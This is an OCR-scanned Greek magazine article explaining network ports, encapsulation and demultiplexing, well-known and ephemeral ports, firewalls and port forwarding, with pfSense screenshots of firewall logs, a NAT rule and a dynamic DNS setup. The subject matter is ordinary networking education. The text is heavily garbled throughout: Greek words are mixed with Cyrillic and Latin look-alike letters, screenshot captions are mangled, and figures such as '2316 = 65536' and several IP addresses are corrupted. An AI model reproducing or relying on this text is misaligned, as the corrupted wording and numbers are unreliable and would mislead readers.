µε τη μορφή headers αποτελούν εξαιρετικά χρήσιμη πληροφορία, ἐτσι 
ώστε σε кабє σταθμὀ (επἰπεδο) τα αρχικἀ δεδομένα να µην εἶναι ανώ- 
уона και να ἐχουν κἀποιο νόημα. Па να δούμε πόσο σηµαντικὀ εἶναι το 
encapsulation των δεδομένων ας παρακολουθήσουμε τι γίνεται ката την 
αντίστροφη πορεία, όταν δηλαδἠ τα δεδομένα ταξιδεύουν апо κάτω προς 
τα πάνω στο TCP/IP stack και συμβαίνει το λεγόμενο demultiplexing. 
Συγκεκριµένα, ας φανταστούμε бт! ¿va Ethernet frame φτάνει στον npo- 
ορισμὀ του (βλ. σχήμα 3). Στο επίπεδο апо πάνω συναντάμε πρωτόκολλα 
όπως то IP και то ARP. Σε ποιο πρέπει να επιδοθούν τα δεδοµένα του 
Ethernet frame; Δεν υπάρχει θέμα, η плпрофоріа αυτή περιλαμβάνεται 
στο Ethernet header! Ας πούμε λοιπὀν бт! τα δεδοµένα προορίζονται για 
το IP. Αυτό апо τη μεριὰ του εννοεῖται ότι δεν ἐχει καμία ὀρεξη να τα 
κρατάει και να κάθονται, οπὀτε πρέπει να αποφασίσει που να τα στείλει. 
Ένα επἰπεδο апо πάνω rou ἐχει πρωτόκολλα όπως та TCP και UDP. Πα va 
μη στείλει τα δεδομένα ὀπου va "vai και γίνει каша φασαρία, κοιτάζει το 
IP header. Eksi βλέπει ὁτι τα δεδοµένα προορἰζονται για το TCP, οπὀτε 
γρήγορα γρήγορα τα στέλνει προς та εκεἰ και ησυχάζει. Το ТСР πρέπει κι 
αυτὸ ν΄’ αποφασίσει τι θα κάνει µε τα δεδομένα που μόλις ἐλαβε, οπὀτε 
κοιτάζει στο TCP header. Εκεἰ θα βρει ἑναν Ίθμπιτο αριθμό, ο οποίος 
ονομάζεται destination port number ñ απλά destination port και, µε 
βάση αυτόν τον αριθμὀ, θα καταλάβει προς ra πού οφείλει να προωθήσει 
τα δεδομένα που ἐχει. 


Ένα port, λοιπὀν, δεν εἶναι τίποτε ἄλλο пара ἑνας Ίθμπιτος αριθµός nou 
Χρησιμοποιεί µια δικτυακἠ εφαρµογή, υπηρεσία ñ server (γενικά, λογι- 


απόφαση µε βάση το 
destination port 
oto TCP/UDP header 


απόφαση µε βάση τον 
αριθµό πρωτοκόλλου 
στο IP header 


απόφαση µε βάση το 
Ethernet header 


Ethernet 


driver zxñuq 3 


Όταν δεδομένα 
φτάνουν σε κάποιο 
network interface 

ενός υπολογιστή, 

το πού θα κατα- 


εισερχόµενο frame λήξουν εξαρτάται 
апд τις πληροφο- 

| ρίες στα διάφορα 
headers. 
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Εικόνα 1 
Σύνδεση SSH σε 
απομακρυσμένο 
OpenSSH server. 
Παρατηρήστε От! 
та ports пои opi- 
οθετούν то камал 
επικοινωνίας *бєу* 
εἶναι ἰδια. (Στη 
θέση του port 22 
το netstat δείχνει 
το ὀνομα της 
υπηρεσίας στην 
οποία παραδοσιακά 
αντιστοιχεί το 22, 
που εἰναι η 55Η.) 
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Ско που µε TOV ἑναν ἡ τον άλλον τρόπο επικοινωνεἰ µε τον ἐξω κόσμο 
μέσω TCP/IP). Στο TCP header υπάρχει τόσο το source port number 
(θύρα αφετηρἰας), ὁσο και το destination port number (θύρα προορι- 
орой). 


Στη μέχρι єб@ περιγραφἠ µας μιλήσαμε για то TCP, αφού το npòypap- 
μα nou χρησιμοποιήσαμε ως παράδειγµα, το Filezilla, χρησιμοποιεί то 
application layer protocol FTP. Κατά τη διακίνηση δεδοµένων µέσω FTP 
δεν θέλουμε απώλειες δεδομένων, επομένως το πρωτὀκολλο μεταφορὰς 
που επιστρατεύεται απὀ το transport layer εἶναι το TCP. Υπάρχουν βέβαια 
κι ἄλλες δικτυακὲς εφαρμογὲς, οι οποίες δουλεύουν πάνω апо ro UDP. 
Κλασικά παραδείγματα αποτελούν εκείνες που χειρἰζοντα!ι streaming εἰ- 
κόνας και ἠχου, ὁπου τότε auró που ενδιαφέρει εἶναι κυρίως η ταχύτητα 
κι Ох! το αν *óAa* τα δεδομένα φτάνουν στον προορισμὀ τους. Όπως 
πάντως συμβαίνει µε τις εφαρμογέὲς TCP, ἐτσι και µε τις UDP λαμβάνουν 
χώρα οι ἴδιες διαδικασίες encapsulation και demultiplexing. Μικροδιαφο- 
ρὲς βέβαια υπάρχουν: Οι πληροφορίες που περνάνε oro ІР апо το UDP 
ονομάζονται UDP datagrams (κι όχι UDP segments), ενώ το μήκος rou 
UDP header εἶναι 8 аут! για 20 bytes, που εἶναι το μήκος του TCP header. 


Προφανώς, port numbers για τον καθορισµὀ των εφαρμογών δεν ἐχουμε 
µόνο στα TCP headers αλλά και στα UDP headers. Π’ αυτὸ κι όταν δεν 
εξυπακούεται το πρωτόκολλο μεταφοράς, βλέπουμε να γράφεται o αριθ- 
uoc port ακολουθούμενος апо µια πλάγια κάθετο kai μετὰ το TCP ἡ το 
UDP (n.x., 1194/TCP ñ 1194/UDP). 
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Πώς δουλεύουν τα δίκτυα 
MW 


Ta ports апо κοντὰ 


Γίνεται φανερὸ бт! ra ports χρησιμοποιούνται για va οριοθετήσουν та 
акра (end-points) ενὸς καναλιού επικοινωνίας μεταξὺ δικτυακών εφαρ- 
μογών, οι οποίες, παρεμπιπτόντως, συνήθως ακολουθούν το μοντέλο 
client-server αλλά ὀχι κατ’ ανάγκη (βλ., π.χ., εφαρμογὲς peer-to-peer). 
Από μόνα τους ὀμωςτα ports δεν αρκούν: χρειάζονται και οι διευθύνσεις 
IP! Για παράδειγµα, ro port 22 απὀ µόνο του δεν εἶναι και πολύ χρήσιμο, 
ακόµη κι όταν ἔχουμε ξακαθαρίσει αν αφορά στο TCP ἡ oro UDP. Αν 
όμως δώσουμε και τη διεύθυνση IP του μηχανήματος (ακριβέστερα: του 
network interface) στο onoio βρίσκεται µια υπηρεσἰα που χρησιμοποιεί το 
port 22, τότε έχουμε καθορίσει επακριβώς то va акро της επικοινωνἰας. 
Ἔτσι, όταν π.χ. γράφουμε 192.168.1.10:22 ñ parabing.com:80, εννοούμε 
το port 22 του μηχανήματος µε διεύθυνση IP το 192.168.1.10 ἡ το port 
80 εκείνου µε domain name ro parabing.com. Παρεμπιπτόντως, το αν 
αυτά τα ports αφορούν στο TCP ἡ στο UDP, εἶναι κάτι που γνωρίζει το 
λειτουργικὀ σύστημα και οι εµμπλεκόμµενες εφαρμογές, δηλαδἠ αυτές nou 
«ακούνε» (listen) anó τα unó συζήτηση ports. 


Σε ἑνα ἡδη εγκαθιδρυμένο κανάλι επικοινωνίας, ra ports κάθε άκρου δεν 
εἶναι υποχρεωτικά ἴδια. Παράδειγμα: Πα την υπηρεσία Secure Shell, η 
οποία βασίζεται στο πρωτόκολλο SSH του application layer, παραδοσιακά 
χρησιμοποιείται το port 22/TCP. Αν ropa συνδεθούµε с’ ἑναν αποµακρυ- 
σµένο SSH server και μετὰ τρέξουμε ἑνα εργαλείο σαν ro netstat, αφε- 
νὸς θα δούμε τη διεύθυνση IP και то port (22) του SSH server, αφετέρου 
θα παρατηρήσουμε ὁτι στο ἆλλο акро της επικοινωνίας, αυτὀ στον Uno- 
λογιστἠ anó τον οποίο τρέξαμε τον SSH client, ro port που ἐχει ανοίξει 
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Εικόνα 2 
Διαφορετικοί SSH 
clients απὀ τον 
ίδιο υπολογιστή, 
έχουν συνδεθεί 
ταυτὀχρονα στον 
ίδιο, αποµακρυ- 
σµένο SSH server. 
Πα κάθε client 
ἐχει ανοίξει κι 

ἑνα διαφορετικὀ 
ephemeral port. 
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εἶναι ἆλλο (βλ. εικὀνα 1). Αν μάλιστα διακὀψουµε τη σύνδεση και µετά 
εγκαθιδρύσουμε µια νέα, θα παρατηρήσουμε бт! то port апо τη μεριά του 
client έχει αλλάξει. Μια ἄλλη бокй που μπορούμε να κάνουμε, εἶναι να 
εγκαθιδρύσουµε апо τον ἰδιο υπολογιστή περισσότερες апо ша συνδὲ- 
σεις ταυτόχρονα, στον ἴδιο SSH server: Πα κάθε μία απ’ αυτές, топіка θα 
ἐχει ανοίξει κι ἑνα διαφορετικὀ port. 


Όπως εἶπαμε προηγουμένως, τα ports εἶναι Ί6µπιτοι αριθμοί. То µἐγιστο 
διαθέσιμο πλήθος ports για κάθε πρωτόκολλο του transport layer, λοι- 
πὸν, εἶναι 2316 = 65536. Επειδή ὁμως ro port 0 εἶναι δεσμευμένο και δεν 
χρησιμοποιείται, τελικἁ για κάθε πρωτόκολλο έχουμε 65535 διαφορετικἁ 
ports — ξεκινώντας απὀ το 1. 


Па ἑνα συγκεκριμένο πρωτόκολλο μεταφοράς (TCP ἡ UDP), μία και μόνο 
μία εφαρµογἠ (ἡ γενικότερα διεργασία) επιτρέπεται να χρησιμοποιεί (να 
ακούει) ¿vav συγκεκριµένο συνδυασμὀ IP_address:port. Δεν μπορούμε, 
n.X., σε υπολογιστἠ µε uia карта δικτύου να τρἐχουµε δύο διαφορετι- 
κοὺς web servers ταυτόχρονα, οι οποίοι αμφότεροι θα χρησιμοποιούν το 
port 80/TCP. Апо την ἄλλη, κάλλιστα μπορούμε να ἐχουμε δύο δικτυακὲς 
εφαρμογὲς που να ακούνε ταυτόχρονα апо το ἰδιο port πάνω ото ІР της 
шас και µοναδικἠς κάρτας δικτύου, арке! η μία εφαρμογἠ θέλει το npo- 
τὀκολλο TCP και η ἄλλη το UDP. 


Тора, апо το σύνολο των 65535 διαθέσιμων ports (για κάθε nporókoA- 
Ло), υπάρχει ¿va υποσύνολο ports τα οποία παραδοσιακἁ χρησιμοποιού- 
ута! апо γνωστές, δημοφιλείς δικτυακὲς υπηρεσίες. Ta ports αυτά βρἰ- 
σκονται κάτω апо το 1024, ονομάζονται well-known ports και μερικὰ 
παραδείγματα παρατίθενται στον ακόλουθο nivaka. 


port transport protocol application protocol 
20 TCP FTP (data) 

21 TCP FTP (command) 
22 ТЕР. SSH 

25 ΤΕΡ SMTP 

53 UDP DNS 

67 UDP DHCP (server) 
68 UDP DHCP (client) 
80 TCP HTTP 

110 ТЄР: ΡΟΡ3 

123 UDP NTP 

143 ТСР ІМАР 

194 ТСР ІКС 

443 ΠΕΡ ΗΤΤΡ5 

445 TCP SMB flle sharing 
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Ta δε νούμερα anó το 1024 ¿wç και TO 49151 εἶναι yia τα λεγόμενα 
registered ports, τα διαχειρίζεται η IANA (Internet Assigned Numbers 
Authority, www.iana.org) κι αποδίδονται σε συγκεκριμένες υπηρεσίες, 
κατόπιν αιτήσεως της ενδιαφερομένης πλευράς. Βεβαίως, αυτό δεν on- 
раім! От! εμεἰς δεν ἐχουμε το ελεύθερο va τα χρησιμοποιούμε όπως 0£- 
λουµε. Πα παράδειγµα, ra ports 1194/TCP και 1194/UDP εἶναι επισήμως 
αντιστοιχισµένα στο OpenVPN (βλ. deltaHacker 007, σελ. 12, καθὼς και 
http://deltahacker.gr/?p-5669). Μπορούμε ooróoo va στήσουμε τον OIKÓ 
нас OpenVPN server nou θα ακούει σε κἀποιο ἆλλο port, π.χ., oro 1199/ 
UDP. Προσέξτε: To ἴδιο μπορούμε να κάνουμε και για ra ports κάτω апо 
το 1024. Па παράδειγμα, σε µια ἐξαρση τρολισμού πιθανώς να ρυθµμἱζαμε 
TOV Web server rou deltahacker.gr, ἐτσι ὡστε να χρησιμοποιεὶ то port 
83. Επειδἠ ὁμως то 80, το προκαθορισμένο port yia то HTTP, ανἠκει στο 
σύνολο των well-know ports κι όλες οι εφαρμογές λαμβάνουν υπόψη το 
γεγονὸς, σύντομα θα μετανιώναμε για τη φάρσα µας. Εκτὸς βέβαια κι av 
ενημερώναμε --με κάποιον μαγικὸ rTpório— ὁλουςτους (υποψήφιους) eni- 
σκέπτες TOU Site, ὥστε στη μπάρα διευθύνσεων του web browser va nàn- 
κτρολογούν deltahacker.gr:83, аут! για το αναμενόμενο deltahacker.gr. 


Τέλος, οι αριθμοί апо το 49152 ¿wç και το 65535 αφορούν σε ports που 
χρησιμοποιούνται σε ειδικὲς περιπτώσεις ἡ σε προσαρμοσμένες (custom) 
εφαρμογὲς. Επίσης, τα ports апо το 49152 και πάνω συχνὰ ανοίγουν au- 
тӧрата και προσωρινά, κατὰ κύριο λόγο апо την πλευρά rou client. Μετά 
τη διακοπἠ της σχετικἠς σύνδεσης та ports διατίθενται και пал για χρή- 
ση, ενδεχομένως апо άλλες εφαρμογές. П’ αυτούς τους λόγους, τα unó 
συζήτηση ports ονομάζονται και ephemeral (εφήμερα). Πα λόγους που 
αφορούν στην ασφάλεια, σε γνωστὲς υπηρεσίες που παραδοσιακἁ χρησι- 
μοποιούν κάποιο well-know port, δεν εἶναι καθόλου σπάνιο va αντιστοι- 
χίζονται, τελικά, ports *nàvo* апо ro 49151. Πα παράδειγμα, ἑνας SSH 
server avri yia ro 22/TCP πιθανώς να χρησιμοποιεί то port 50129 (εντε- 
Aoc τυχαίο παράδειγμα, αλήθεια σας λέμε). Έτσι, èva αυτοματοποιημµέ- 
vo script που σαρώνει το Internet αναζητώντας αδυναμίες σε γνωστές 
υπηρεσίες, μᾶλλον 8a αποτύχει να δει £vav OpenSSH server που ακούει 
για αιτήσεις στο port 50129/TCP. Πάντως η αντιστοίχιση «περίεργων» 
ports σε γνωστές υπηρεσίες δεν σημαίνει ὁτι ο υπεύθυνος διαχειριστἠς 
δικαιούται ν΄ αδιαφορεί για patches που διορθώνουν γνωστά προβλήματα 
ασφαλείας. Απλά το λέμε :) 


Περισσότερα yia ra διαφορετικἀ υποσύνολα ports µπορείτε να δείτε και 
στο σχετικὀ λήμμα της Wikipedia: 


http://en.wikipedia.org/wiki/List of TCP and UDP port numbers 


To καλοπροαίρετο firewall 


Oi πληροφορἱες yia ro source και ro destination port, που βρἰσκονται 
ота TCP kai UDP headers, δεν εἶναι διαθέσιμες μόνο апо τους άμεσα 
εμπλεκόμενους υπολογιστές, N.X., τον αποστολέα και τον παραλήπτη 
ενὸς καναλιού επικοινωνίας. Σε οποιονδήποτε ἆλλο σταθμὀ της πορεἰας 
ενὸς πακέτου, τα περιεχόμενα του TCP ἡ του UDP header εἶναι δυνατὸν 
να εξεταστούν και να αξιοποιηθούν ανάλογα. 


Αυτὸ ακριβώς кам και το firewall στον DSL router, μπροστὰ апо τον 
υπολογιστὴ ἡ τους υπολογιστὲς µας. Κατ’ αρχάς, orav ro firewall βλὲ- 
πει ἑνα πακέτο nou ἐχει ξεκινήσει апо το TONIKO δίκτυο πίσω του (αυτό 
δηλαδή που προστατεύει), το αφήνει να περάσει και, ἠσυχα κι ωραία, να 
πάει στο кало. Αργότερα, ὁταν βλέπει να ἐρχεται апо ἐξω, δηλαδή апо то 


Πώς δουλεύουν τα δίκτυα 
Αα 


Ө pfsense.parabing.net - Status: System logs: Firewall - Mozilla Firefox 
Ele Edit view History Bookmarks 
| Q9 pfsense.parabing.net - Status, 


69 202 | & 192.168.99.1/diag logs filter.php v @ Εν ooge 


Status: System logs: Firewall 


ООо [rona num T esse Tere T ven eost stance [onere T ure 73 


Normal View | Dynamic View | Summary View 


si Source Destination 
Mar 18 22:53:20 Ө E3 88.165.123.184:51117 Ө (š 10.20.30.250:6881 
Mar 18 22:53:20 Ө 2 эв.165.134136:62709 © 0 10 20.30.250:6881 
Mar 18 22:53:20 © [š 10.20.30.250:0881 
Mar 18 22:53:22 0 (4 88.165.123.184:51117 @ 14 1020.30.250:6881 
Mar 18 22:53:23 © E3 68.165.134.136:62709 | @ E3 10.20.30.250:6881 
Mar 18 22:53:23 | Θ E3 88.165.134.136:53544 Ө (3 1020.30.250:6981 
Mar 18 22:53:23 © E3 41.39.148.104:16504 © (š 10.20.30.250:6881 
Mar 18 22:53:24 Ө E 58.165 .123.184:6000 Ө (š 10.20.30 .250:6881 

Mar 18 22:53:26 © [4 66.165.123.184:1117 @ š 1020.30.250:6881 


Mar 18 22:53:29 Ө E 88.165.134.136:62709 Ө (š 10 20.30.250:6881 


Mar 18 22:53:29 © (3 в8.165.134.130:53544 © (š 10.20.30.250:6881 

Маг 18 22:53:30 @ E3 41.39.148.104:16504 | © (3 10.20.30.250:6881 

Mar 18 22:53:42 Ф 53 50.s8.131.34:24341 © [3 10.20.30.250:6881 
Mar 18 22:53:42 ФЕ 10.20.30.1 0 224001 

| Mar 18 22:53:43 Ө E3 10.20.30 5:17500 Ө [3 255 255 255.255:17500 


Mar 18 22:53:43 Ө E3 10:20.30.5:17500 Ө [3 1020.255.255:17500 


@ DNSstuff Tool Results - Mozilla Firefox 
File Edit view History Bookmarks Tools 
| pfsense;parabing.net ЗӨ {< pfsense.parabing.net - Diagn.. 3 | Л DNSstuff Tool Results о 
@ private.dnsstuff.com/tools/ipall.ch?ipe41.39.148.104 “е coogle 


IP Information - 41.39.148.104 a 


IP address: 41.39.148.104 

Reverse DNS: host-41.39.148.104.tedata.net. 

rae DNS authenticity: [соф be forged: hostname host-41,39.148.104.tedata.net, does not exist] 
ASN: 8452 


ASN Name: TEDATA (TEDATA) 
IP range connectivity: 7 

Registrar (per ASN): RIPE 

Country (per IP registrar): EG [Egypt] 

Country Currency: EGP [Egypt Pounds] 

Country IP Range: 41.32.0.0 to 41.47.255.255 
Country fraud profile: High 

City (per outside source): Unknown. 

Country (per outside source): EG [Egypt] 

Private (internal) IP? No 

IP address registrar: vwhois.afrinic.net 

Known Proxy? No 

Link for WHOIS: 41.39.148.104 
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For even more details about our Internet connection (browser, Operating System, 
HTTP headers, DNS servers and more), you can qo here. 
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Internet, £va пакёто που σχετἰζεται р’ αυτό που άφησε να περάσει npo- 
ηγουμένως, το αφήνει να περάσει μέσα. Δεν ἐχει λὀγο να το εμποδίσει, 
αφού ξέρει ότι αποτελεἰ μέρος µιας επικοινωνἰας που ξεκίνησε апо το TO- 
πικὀ δίκτυο, πίσω του. Av το ἐκοβε θα δημιουργούσε προβλήματα στους 
χρήστες του τοπικού δικτύου και, προς Θεού, δεν εἶναι αυτή η πρὀθεσή 
του. Αντίθετα, αυτό που θέλει εἶναι апла να προστατεύει. Αναρωτιέστε 
σε ποιες περιπτώσεις ἐχει την ευκαιρία να το αποδεικνύει στην πράξη; 
Μα, κάθε фора που βλέπει να πλησιάζει ¿va «ξεκάρφωτο» πακέτο, δη- 
λαδἠ κάποιο που δεν αφορά σε επικοινωνία που ἐχει ξεκινήσει апо то 
δίκτυο nico του. Σε τέτοιες περιπτώσεις, λοιπὀν, To firewall ciTe λέει στο 
πακέτο кайт! σαν «το port στο onoio κατευθύνεσαι εἶναι κλειστὀ, φύγε» 
gite апла кам απὀλυτη ησυχία και δεν λέει τίποτε. Όπως και v’ αντιδρά- 
σει, πάντως, TO εισερχόµενο πακέτο δεν то αφήνει να περάσει! 


Καταλαβαίνουμε λοιπὸν ὁτι ro firewall εἶναι ο φύλακας-άγγελος κάθε TO- 
πικού δικτύου, ωστόσο υπάρχουν περιπτώσεις που δεν θέλουμε να εἰναι 
πολὺ αυστηρό pe ra εισερχόμενα πακέτα, ὁσο ξεκάρφωτα κι αν δείχνουν. 


Εμπόδια και προβλήματα 


Υποθέστε бт! στο δίκτυο nico апо τον router έχουμε στήσει ἐναν ἡ πε- 
ρισσότερους servers. Όλοι τους εξυπηρετούν, ωραία και καλά, ἄλλους 
υπολογιστὲς, οι οποίοι επίσης βρίσκονται πίσω anó τον router. Ένα απ΄ 
айта τα μηχανήματα, n.x., ἑνας fileserver nou τρέχει το OpenSSH, 0£- 
Aouus να εἶναι προσβάσιμο κι апо τον ἐξω κόσμο. O! λὀγοι εἶναι, vopi- 
ζουμε, προφανεἰς: Ακόμα κι ὀταν βρισκόμαστε εκτὸς τοπικού δικτύου 
--πρακτικἁ οπουδήποτε στον πλανήτη--, επιθυμούμε να έχουμε ασφαλἠ 
πρόσβαση στον fileserver Tou τοπικού δικτύου µέσω SSH. 


Δεν εἰναι παράλογη η επιθυμία µας, υπάρχουν όμως δύο προβλήματα £60. 
Κατ’ αρχάς, µε ro που θα επιχειρήσουμε να συνδεθούµε στον OpenSSH 
server και βρικὀμαστε εκτὸς τοπικού δικτύου, το firewall στον router θα 
δει εισερχόμενα πακέτα τα οποία *бєу* αφορούν σε επικοινωνία που ξε- 
κίνησε апо το δίκτυο πίσω του. Περιχαρὲς, λοιπὸν, nou για ἄλλη µια φορά 
θα κάνει το καθήκον του, θα τα εμποδίσει να περάσουν. Ας υποθέσουμε 
όμως бт! έχουμε μεριμνήσει апо πριν γι’ αυτό, κι ἐχουμε ανοίξει το port 
22/TCP (το προκαθορισμένο yia ro SSH) στο firewall. Ουσιαστικά, ἐχουμε 
ζητήσει апо ro firewall να µην εμποδίζει τα εισερχόμενα πακέτα nou στο 
TCP header τους ¿xouv ως destination port ro 22. Ωραία, αλλά αυτό δεν 
βοηθά και πολὺ: Πού στο καλὸ θα καταλήξουν αυτά τα πακέτα; 


Μην ξεχνάτε бт! ἑνας DSL router --κάθε router, για την ακρἰβεια-- έχει 
τουλάχιστον δύο network interfaces, το καθένα απὀ τα οποία ἐχει τη δικἠ 
του διεύθυνση IP. Το ἑνα interface εἶναι το δημόσιο (WAN interface), 
βλέπει απευθεἰας το Internet κι ἐχει πάρει διεύθυνση IP απὀ τον Internet 
Service Provider (ISP). Αυτή η διεύθυνση καλείται δημόσια (public IP) 
και στέκεται µια хара στο Internet. Το ἆλλο interface βλέπει το TONI- 
KÒ δίκτυο (LAN) nico anó τον router. Αυτό εἶτε ἐχει ἑνα εργοστασια- 
ка προρυθμισμένο IP gite του ἐχουμε δώσει éva ἀλλο, εμεὶς. Σε κάθε 
περίπτωση, то ІР του λεγόμενου LAN interface, καθὼς κι εκείνα των 
υπολογιστὠν/συσκευὼν εντὸς TOU LAN, εἶναι ιδιωτικἁ (private) και un- 
προσβάσιμα απὀ το Internet. Οι διευθύνσεις αυτὲς εἶναι µια хара για 
топіка δίκτυα αλλά χαρακτηρἰζονται oc non-routable, αφού δεν uno- 
poúv να σταθούν στο Internet (βλ. και http://deltahacker.gr/2012/06/14/ 
hownetsworkpart2b/#item7). 


Πώς δουλεύουν τα δίκτυα 
Αα 


T pfsense.parabing.net - Firewall: NAT: Port Forward: Edit - Mozilla Firefox w 


Hle Edit View History Bookmarks Tools Help 
| @ pfsense.parabing.net - Firewall: ... [*| 


«$e Га 192.168.99.1/Óirewall nat edit.php УС! B «ους 


Firewall: МАТ: Port Forward: Edit ο 


η — Disable this rule 


Setthis option to disable this rule without removing it from the list. 


DR (ЧО 
Na RDR ση — Enabling this option will disable redirection for traffic matching this rule. 
Hint this option is rarely needed, dont use this unless you know what you're doing. 


Interface WAN ν 


Choose which interface this rule applies to. 
Hint in most cases, you'll want to use WAN here. 


ΙΡ ν X— 
Choose which IP protocol this rule should match. 
Hint іп most cases, you should specify TCP here. 


Advanced - Show source address and port range 


— not 
Use this option to invert the sense of the match. 


μου... 
Address: [зї 


Destination port range from: (oiher) ` zm < 


ю: — (other) ν 


Specify the port or port range tor the destination of the packettor this mapping. 
Hint you can leave the Ίο’ field empty ifyou only wantto map a single port 


ООШ — K 
Enter the internal IP address ofthe server on which you wantto map the ports. 
e.g. 192.168.112 


Redirect target port (other) у ΕΝ ——= 
Specily the port on the machine with the IP address entered above. In case of a portrange, specify the beginning port 
ofthe range (the end port will be calculated automatically. 
Hint this is usually identical to the Чгот' port above 


Description 


= r1 
@ pfsense.parabing.net - Firewall: NAT: Port Forward - Mozilla Firefox 


File Edit View History Bookmarks Tools Help 
| @pfsense.parabing.net - Firewall: ... [+ | 


($e | Ф 192.168.99.1/fire 


at.php να B coge 


agr › Help 


WAN | 50129 192.168.99.10 | 22 (SSH) 
address 


Εικόνα 5 

Ορισµός κανόνα port forwarding, στο pfSense. Ta πακέτα που 
φτάνουν στο port 50129/TCP του WAN interface, θέλουμε να 
ανακατευθύνονται στο port 22/TCP rou μηχανήματος µε IP 
192.168.99.10, πίσω апо ro firewall. 


ptSense is © 2004 - 2012 by BSD Perimeter LLC. АП Rights Reserved. [view license] 
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Ας πούμε тора Ori εἰμαστε στον Δομοκὸ pe To laptop µας, και θέλουμενα 
συνδεθούµε μέσω SSH στον fileserver, πίσω апо τον DSL router µας στην 
Καλαμαριά, Αναγκαστικἁ, η σύνδεση θα αφορά στο δημόσιο IP του router 
και συγκεκριµένα στο port 22/TCP. Mepikoi routers έχουν ενεργοποιημέ- 
νο TOV δικὀ τους SSH server, αλλά δεν θα ἦταν παράλογο να υποθέσουμε 
ὁτι ο ӧікӧс̧ µας δεν ἐχει. (Αν θέλετε, στη θέση του SSH βάλτε κάποια 
ἄλλη υπηρεσία — η ουσία δεν αλλάζει.) O καημένος ο router µας, λοιπὸν, 
vai μεν δεν θα εμποδίσει εισερχόμενα πακέτα που απευθύνονται στο port 
22/TCP του WAN interface (χάρη στην υποτιθέμενη ρύθμιση που κάναμε 
προηγουμένως), апо την ἄλλη ὁμως δεν θα ξέρει τι ακριβώς να κάνει τα 
εισερχόμενα πακέτα, οπὀτε αυτά δεν θα καταλήξουν κάπου κι εμεὶς θα 
εξακολουθούμε να µην κάνουμε τη δουλειά нас. 


To εξαιρετικἀ βολικὸ port forwarding 


To πρόβλημα nou μόλις περιγράψαμε πηγάζει апо το γεγονὸς ӧті οι δι- 
ευθύνσεις IP στα топка δίκτυα δεν ἐχουν κανένα απολύτως νόημα στο 
Internet. Ευτυχώς, κάπου εδὠ ἐρχεται η τεχνικἠ του Static NAT ἡ aà- 
Мос port forwarding, την οποία υλοποιούν όλοι οι routers. Με Ліүа κι 
апла λόγια, το port forwarding επιτρέπει σε πακέτα που ξεκινούν апо 
οπουδήποτε στο Internet να φτάνουν σε μηχανήματα τοπικὠν δικτύων. 
Γενικά, η λογική του port forwarding εἶναι πολύ апл και συνοψίζεται 
κάπως έτσι: 


Πακέτα που φτάνουν ото port X του WAN interface, ανακατεύθυνέε 
τα στο port Y του υπολογιστή πίσω апо ro LAN interface, ο οποίος 
έχει την τάδε ιδιωτική IP. 


Ας δούµε μερικά συγκεκριµένα παραδεἰγµατα port-forwarding. 


ο Τα εισερχόμενα πακέτα που φτάνουν στο port 22/ТСР του WAN 
interface, στείλε ra στο port 22/TCP rou μηχανήματος µε ιδιωτικὀ 
IP το 192.168.99.10. (Απλἠ περίπτωση SSH server, πίσω απὀ τον 
router.) 


ο Τα εισερχόμενα πακέτα που φτάνουν στο port 50129/TCP του WAN 
interface, στείλε τα στο port 22/TCP rou μηχανήματος µε ιδιωτικὀ 
IP ro 192.168.99.10. (Κι εδώ ἐχουμε τον ἰδιο SSH server, ωστόσο 
τα εισερχόμενα πακέτα δεν φτάνουν στο προκαθορισμένο port του 
SSH.) 


ο Τα εισερχόμενα πακέτα που φτάνουν στο port 1194/UDP του WAN 
interface, στεἰλε ra στο port 1194/UDP του μηχανήματος µε ιδιω- 
TIKÓ IP το 192.168.99.15. (Απλἠ περίπτωση OpenVPN server, πίσω 
апо τον router.) 


ο Τα εισερχόμενα πακέτα που φτάνουν ото port 2288/UDP του WAN 
interface, στείλε τα στο port 1194/UDP του μηχανήματος µε ιδι- 
ωτικὀ IP το 192.168.99.15. (O ἴδιος OpenVPN server, ωστόσο τα 
εισερχόμενα πακέτα δεν φτάνουν στο προκαθορισμένο port της 
υπηρεσίας.) 


ο Τα πακέτα που φτάνουν στο port 51413/TCP του WAN interface, 
στείλε τα στο port 51413/TCP του μηχανήματος µε ιδιωτικὀ IP 
το 192.168.99.5. (Στο μηχάνημα nico anó τον router τρέχει 
ο Transmission BitTorrent client, µε ενεργοποιημένο το Micro 
Transport Protocol για την επικοινωνία rov peers.) 


Πώς δουλεύουν τα δίκτυα 
ri 


Θ < pfsense.parabing.net - Services: Dynamic DNS client - Mozilla Firefox К c) ç 
Ele Edit View History Bookmarks Tools Help 


| ffsense,.parabing.net - Services: ... 
P | 
($e | @ 192.168.99.1/5en yndns. edit. php?ideo v @| Εν scogle ^ @ 


Services: Dynamic DNS client 


Dynamic DNS 
Disable 


Service type No-IP 


Interface to monitor WAN v 


Hostname R à deltanet.no-ip.org 
Note: 
Enter the complete hostdomain name. example: myhost.dyndns.org 


Note: With DynDNS service you can only use a hostname, not an IP address. 
Set this option only if you need a special MX record. Not all services support this. 


Wil 
сагі — Enable Wildcard 


Username ü subzraw 


Username is required for all types except Namecheap and FreeDNS. 


Password. 4) ee 
FreeDNS (freedns.afrald.org): Enter your "Authentication Token" provided by FreeDNS. 


Description *, Dynamic DNS from No-IP 


Save Cancel 


Note: 
You must configure a DNS server in System: General setup or allow the DNS server listto be overridden by 
DHCP/PPP оп WAN for dynamic DNS updates to work. 


@ pfsense.parabing.net - Services: Dynamic DNS clients - Mozilla Firefox 
Ele Edit View History Bookmarks Tools Help 


| @ pfsense.parabing.net - Services: ,.. [+ 


С | @ 192.168.99.1/: dyndns.php v С) Εν сосе 


Services: Dynamic DNS clients 


онон 
ENL 


КО deltanet no-p.org 176.92.85.249 


Note: 
IP addresses appearing in green are up to date with 
Dynamic DNS provider. 


Εικὀνα 6 
Μεταξύ των υπηρεσιών dynamic DNS που υποστηρίζει το 
pfSense, εἶναι και η δωρεάν του no-ip.com. 


pfSense is © 2004 - 2012 by BSD Perimeter LLC. All Rights Reserved. [view license] 
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Όπως γίνεται φανερὀ, To port στο WAN interface του router δεν εἶναι uno- 
χρεωτικὀ να ‘үа ἴδιο µε το port στο μηχάνημα-προορισμού, πίσω апо τον 
router. Απεναντίας, yia να δυσκολεύουμε λίγο τη ζωή των script kiddies, 
δεν εἶναι καθόλου κακἠ ιδέα να φτιάχνουμε kavóveg port forwarding µε 
«άσχετα» ports (πάνω апо ro 49152) στο WAN interface. 


Oa αναρωτιἑστε ropa nog ορἰζουμε κανόνες port forwarding στον router. 
Αρχικἁ, οφεἰλουμε va ανοΐξουµμε ¿vav web browser --σε υπολογιστή πίσω 
